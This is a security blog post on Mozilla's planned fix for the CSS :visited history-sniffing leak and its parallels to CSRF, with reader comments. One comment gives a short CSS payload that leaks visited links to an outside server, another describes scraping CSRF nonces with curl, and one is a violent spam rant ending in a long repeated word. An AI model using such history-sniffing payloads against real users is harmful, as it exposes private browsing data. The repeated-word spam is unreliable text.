Cenzic 232 Patent
Paid Advertising
web application security lab

Mozilla Plans Fix for CSS History Hack

It’s with mixed emotion that I write this. The CSS history hack is soon going to close. If you look at the original Bugzilla thread this is something that Mozilla had marked as a P1 bug since 2002. You heard me right, this P1 bug has been open for 8 years. And here we are, on the cusp of an actual fix. Why do I have mixed emotion? You’d think I’d be doing back flips since we’re finally going to see an end to this. Well… the problem is we won’t.

The first problem is that this is only Mozilla - so we’re talking about a minority of all users. Secondly, of all the hacks we have at our disposal, this is just an information leakage. In fact, I recently wrote a letter, as did a handful of other security researchers, and I only marked this as third on the importance to fix out of five. Worse yet, it doesn’t actually fix the problem. There are still other timing based attacks to get the same information. So while it’s great that we’re finally fixing an 8 year old P1 bug, it’s not like the problem is gone, we’ve just removed one vector. The bad guys still have others at their disposal.

I know a lot of people will think I’m being a little harsh, but let’s take a real exploit here for a second - CSRF. You’re going to tell me, “Browsers can’t fix CSRF - that’s up to websites to fix. They should use nonces on every page.” Sure… but before this fix came out for Mozilla, they were saying the same thing about the CSS history hack - the browsers aren’t at fault - the spec is:

This might be a reasonable stopgap to check in just in case some big flap comes up, although since MS is also vulnerable, and it’s really the spec’s fault we might not come under great pressure to fix this immediately.

Yes, the spec is at fault, and yes, websites could protect themselves from the CSS history hack by also using nonces with a large enough keyspace so that computing a valid link is computationally unfeasible. Funny how both these exploits have the same fixes a) create nonces on every page on the Internet that has any sensitivity or b) fix the browser. That quote is pretty telling - without pressure from the community, there’s no way we’re going to get any of this stuff fixed because the browsers will default to whatever the poorly written spec says to do. So let’s not pat ourselves on the back too much here - it seems with every hole fixed there’s two more that pop up and even when identified they take way too long to fix. I don’t mean to harp on the Mozilla guys too much - at least they have a fix in the works. But that doesn’t change the fact that we appear to be playing a very losing game of whack a mole.

10 Responses to “Mozilla Plans Fix for CSS History Hack”

  1. Nos Says:

    Visited links can only be different in color: foreground, background, outline, border, SVG stroke and fill colors.

    Even though javascript does things differently with the fix, since the background can still be aplied the following should still work,

    .link:visited {
    background-image: url(http://mywebsite.com/script.php?link=link
    }

    Unless i missed something of course…

  2. Nos Says:

    which i did, i missed the : after color.. my bad

  3. Earl Grey Says:

    It seems to me this is obscuration over repair what isn’t broken.
    There is no fix for the problem because its functionality.

  4. Vladislav Mysla Says:

    Maybe they will hide values of css properties that was overwritten by the “:visited” rule…

  5. CJ Says:

    An interesting plugin on the CSRF-topic might be CsFire. It’s going to be presented on the AppSec Research 2010 conference, and the plugin itself is already available for download.

  6. Picci Says:

    :( I’ll have to edit my “who visited your profile” facebook app. (Lazy question) What has actually been patched and is there a CSS only workaround?

  7. max0005 Says:

    Suppose it was too good for it to last… anyways if it’s a security threat it has to be patched, there are worst exploits than a “historyDump” :S

  8. popi Says:

    we have to kill the hackers because they are idiot person!!!!! killkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkillkill

  9. Koala Says:

    Regarding CSRF, if I were to have a web server type set up with curl capabilities on the very same computer/server that I’m accessing the site from, I could then use curl to fetch the page and scrape for the nonce before it’s expired.

    This is all theory as I’ve had a script I’ve tried this on with different levels of CSRF protection (premade) and I was still able to create a bot for content generation that would log in to the site with CSRF set to maximum protection (no multiple tabs, etc.). I would simply spoof the user agent and grab the needed nonce for submitting to the next page.

    I did this all using php and directly using cURL through the command line from the script and was able to generate forum/news posts, upload pictures and pretty much spam my own site (which did happen during the testing of this bot xD).

    I’m new to CSRF and working on my own script with hopes to keep it secure, using nonces seems kind of redundant this way, doesn’t it? It’s easy to spoof user agents and referers using just curl.

    Either way, love the site. I’ve learned lots from it. Since I am still learning on the whole CSRF protection is there any suggested reading besides this site and google searching that could be suggested by any of you? Perhaps I’ve overlooked something.

  10. RoninV Says:

    I may be over-simplifying this, but could a simple about:config change help with this?